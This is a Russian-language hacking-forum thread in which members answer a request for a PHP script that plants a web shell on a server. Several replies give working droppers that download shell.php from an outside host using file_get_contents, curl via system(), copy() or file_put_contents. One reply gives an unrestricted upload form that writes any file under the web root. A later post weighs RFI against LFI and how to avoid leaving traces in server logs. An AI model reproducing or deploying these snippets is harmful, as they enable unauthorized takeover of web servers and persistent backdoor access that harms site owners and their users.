PhP скрипт заливающий шелл |
09.01.2008, 17:55
|
|
Новичок
Регистрация: 18.03.2005
Сообщений: 20
С нами:
11130000
Репутация:
5
|
|
PhP скрипт заливающий шелл
Последний раз редактировалось CyBeR_MaE$tR0; 01.05.2010 в 02:25..
|
|
|
09.01.2008, 18:03
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от CyBeR_MaE$tR0
Прошу помощи, т.к. никак не могу сделатЬ, пхп скрипт, при запуске которого, с серванты бы скачивался файл, в туже папку откуда запущен скрипт, и переименовывался в shell.php.
очень надо
заранее благодарен
PHP код:
<?
$shell=file_get_contents('http://server/shell.txt') or die('can\'t download shell');
$fp=fopen('shell.php','wb') or die('can\'t fopen()');
fwrite($fp,$shell);
fclose($fp);
?>
|
|
|
|
09.01.2008, 18:07
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
Если ОС никсы и SAFE_MOD=OFF и установлен CURL, то можно так:
PHP код:
<?php
system("CURL http://site.ru/shell.txt > shell.php");
?>
Также можно поизвращаться с WGET.
А вообще самый правильный вариант, это что предложил Macro  . |
|
|
|
09.01.2008, 18:17
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
или так(уже с формой, может я тебя не правильно понял):
PHP код:
$path = $_SERVER['DOCUMENT_ROOT'];
$uplouder = <<<HERE
<html><head><META http-equiv=Content-Type content="text/html; charset=windows-1251">
<title> Загрузка файлов на сервер </title></head>
<body>
<h2><b> Форма для загрузки файлов </b></h2>
<form action="upload.php" method="post" enctype="multipart/form-data">
Путь к файлу на сервере
<input type="text" name="new_path" value = $path><br>
Имя файла на сервере
<input type="text" name="new_name" value = "uploud.php"><br>
<input type="file" name="filename"><br>
<input type="submit" value="3aгpyзитьтb"><br>
</form>
</body>
</html>
HERE;
$uploadfile= @$_POST['new_path'] . "/" . @$_POST['new_name'];
if (move_uploaded_file(@$_FILES['filename']['tmp_name'], $uploadfile))
{
echo "Файл успешно загруженн, он доступен по этому пути:" . $uploadfile ;
}
else
{
echo $uplouder;
}
|
|
|
|
13.01.2008, 10:33
|
|
Постоянный
Регистрация: 07.01.2008
Сообщений: 591
С нами:
9653789
Репутация:
549
|
|
Да что так заливать шелл сложно на форум - нет смысла переименовывать, так как php файл на форум же залить сложно
|
|
|
|
13.01.2008, 11:02
|
|
Banned
Регистрация: 05.01.2008
Сообщений: 49
С нами:
9657017
Репутация:
59
|
|
PHP код:
<body bgcolor="EEEEFF">
<font color="red">
<center><h1>
<?php
$ok = "Чувак! Ты залил шелл, на этот сервак! :)";
$no = "Облом!!! нету прав на запись.";
if(copy("http://www.pr0gram.nm.ru/shell.php", "./shell.php")) echo "$ok"; else echo "$no";
?>
</h1><center>
</font>
|
|
|
|
17.07.2009, 20:05
|
|
Познающий
Регистрация: 24.06.2007
Сообщений: 84
С нами:
9937824
Репутация:
192
|
|
сори что поднимаю тему, но есть еще один отличный способ, одной строкой:
PHP код:
file_put_contents('shell.php',file_get_contents('http://site.com/shell.txt'));
Работает везде. |
|
|
|
17.07.2009, 23:06
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Сообщение от X-FRITS
сори что поднимаю тему, но есть еще один отличный способ, одной строкой:
PHP код:
file_put_contents('shell.php',file_get_contents('http://site.com/shell.txt'));
Работает везде. угу а еще copy('http://site.com/shell.txt','shell.php'); и еще 5 тысыч способов, я б минусовал за такое ей богу  .
|
|
|
|
28.07.2009, 19:58
|
|
Познающий
Регистрация: 24.06.2007
Сообщений: 84
С нами:
9937824
Репутация:
192
|
|
Сообщение от PaCo
угу а еще copy('http://site.com/shell.txt','shell.php'); и еще 5 тысыч способов, я б минусовал за такое ей богу . Интересно за что это бы ты минусовал?? Если этот способ никто не написал, и я не скопипастил.
А то что способ легкий и если ты его знаешь, это не значит что его знают все.
P.S. я считаю что ты мог бы и промолчать, так как твой пост был неуместен.
|
|
|
|
28.07.2009, 20:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от X-FRITS
сори что поднимаю тему, но есть еще один отличный способ, одной строкой:
PHP код:
file_put_contents('shell.php',file_get_contents('h ttp://site.com/shell.txt'));
Работает везде.
щаз, везде. ЛОЛ!!!
Только если allow_url_fopen=on
Практически всегда лучше юзать локальные формы загрузки, имхо
RFI - это вообще палево. Палево вашего сервака с шеллом. Даже если есть RFI всё-равно всегда лучше юзать LFI-версию загрузки. Всё ж в логах остается, если вы не уверены, что порутаете сервак
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
